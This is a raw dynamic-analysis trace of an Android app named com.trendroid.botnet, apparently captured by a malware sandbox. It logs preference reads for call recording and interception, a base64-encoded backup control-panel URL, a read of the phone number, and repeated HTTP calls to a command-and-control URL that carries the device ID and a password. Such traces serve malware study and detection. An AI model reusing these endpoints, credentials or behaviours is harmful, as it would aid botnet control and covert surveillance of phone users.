D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/misc/user/0/cacerts-added]
D/S4URC   ( 2249): [SDK] [java.io.File] [isFile] [FilePath][String] [/data/misc/user/0/cacerts-added/d6947cd7.0]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/system/etc/security/cacerts]
D/S4URC   ( 2249): [SDK] [java.io.File] [isFile] [FilePath][String] [/system/etc/security/cacerts/d6947cd7.0]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/misc/user/0/cacerts-added]
D/S4URC   ( 2249): [SDK] [java.io.File] [isFile] [FilePath][String] [/data/misc/user/0/cacerts-added/01017373.0]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/system/etc/security/cacerts]
D/S4URC   ( 2249): [SDK] [java.io.File] [isFile] [FilePath][String] [/system/etc/security/cacerts/01017373.0]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/misc/user/0/cacerts-added]
D/S4URC   ( 2249): [SDK] [java.io.File] [isFile] [FilePath][String] [/data/misc/user/0/cacerts-added/d4c339cb.0]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/system/etc/security/cacerts]
D/S4URC   ( 2249): [SDK] [java.io.File] [isFile] [FilePath][String] [/system/etc/security/cacerts/d4c339cb.0]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/system/etc/security/cacerts/d4c339cb.0]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/misc/user/0/cacerts-removed]
D/S4URC   ( 2249): [SDK] [java.io.File] [isFile] [FilePath][String] [/data/misc/user/0/cacerts-removed/d4c339cb.0]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/misc/user/0/cacerts-removed/d4c339cb.0]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/misc/keychain/pins]
D/S4URC   ( 2249): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/misc/keychain/pubkey_blacklist.txt]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/misc/keychain/pubkey_blacklist.txt]
D/S4URC   ( 2249): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/misc/keychain/serial_blacklist.txt]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/misc/keychain/serial_blacklist.txt]
D/S4URC   ( 2249): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLMessageDigestJDK$SHA1]
D/S4URC   ( 2249): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.HttpHandler]
D/S4URC   ( 2249): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLContextImpl]
D/S4URC   ( 2249): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://nandroid.uphero.com/Panel/get-functions.php?UID=9dd4736125bf4d04&Password=anonymous12]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][getInt] [Int][Timeout] [Return][10000]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][RecordCalls] [Return][true]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][putBoolean] [Key][RecordCalls] [Value][true]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][intercept] [Return][false]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][intercept] [Return][false]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][putBoolean] [Key][intercept] [Value][false]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][AndroidID] [Return][9dd4736125bf4d04]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][AndroidID] [Return][9dd4736125bf4d04]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][File] [Return][/storage/sdcard0/System]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][File] [Return][/storage/sdcard0/System]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][urlPost] [Return][/message.php?]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][urlPost] [Return][/message.php?]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][backupURL] [Return][aHR0cDovL3RyZW5kcm9pZGJvdG5ldGFybXkuc2l0ZTUwLm5ldC9QYW5lbA==]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][backupURL] [Return][aHR0cDovL3RyZW5kcm9pZGJvdG5ldGFybXkuc2l0ZTUwLm5ldC9QYW5lbA==]
D/S4URC   ( 2249): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.HttpsHandler]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][getInt] [Int][Timeout] [Return][10000]
D/S4URC   ( 2249): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 2249): [NDK] [SYSCALL] [socket] [TYPE][string] [TCP]
D/S4URC   ( 2249): [NDK] [SYSCALL] [stat] [PATH][string] [/dev/urandom]
D/S4URC   ( 2249): [NDK] [SYSCALL] [open] [PATH][string] [/dev/urandom] [RETURN][int] [40]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/misc/user/0/cacerts-added]
D/S4URC   ( 2249): [SDK] [java.io.File] [isFile] [FilePath][String] [/data/misc/user/0/cacerts-added/d6947cd7.0]
D/S4URC   ( 2249): [NDK] [SYSCALL] [stat] [PATH][string] [/data/misc/user/0/cacerts-added/d6947cd7.0]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/system/etc/security/cacerts]
D/S4URC   ( 2249): [SDK] [java.io.File] [isFile] [FilePath][String] [/system/etc/security/cacerts/d6947cd7.0]
D/S4URC   ( 2249): [NDK] [SYSCALL] [stat] [PATH][string] [/system/etc/security/cacerts/d6947cd7.0]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/misc/user/0/cacerts-added]
D/S4URC   ( 2249): [SDK] [java.io.File] [isFile] [FilePath][String] [/data/misc/user/0/cacerts-added/01017373.0]
D/S4URC   ( 2249): [NDK] [SYSCALL] [stat] [PATH][string] [/data/misc/user/0/cacerts-added/01017373.0]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/system/etc/security/cacerts]
D/S4URC   ( 2249): [SDK] [java.io.File] [isFile] [FilePath][String] [/system/etc/security/cacerts/01017373.0]
D/S4URC   ( 2249): [NDK] [SYSCALL] [stat] [PATH][string] [/system/etc/security/cacerts/01017373.0]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/misc/keychain/pins]
D/S4URC   ( 2249): [NDK] [SYSCALL] [open] [PATH][string] [/data/misc/keychain/pins] [RETURN][int] [-1]
D/S4URC   ( 2249): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://nandroid.uphero.com/Panel/get-functions.php?UID=9dd4736125bf4d04&Password=anonymous12]
D/S4URC   ( 2249): [NDK] [SYSCALL] [socket] [TYPE][string] [TCP]
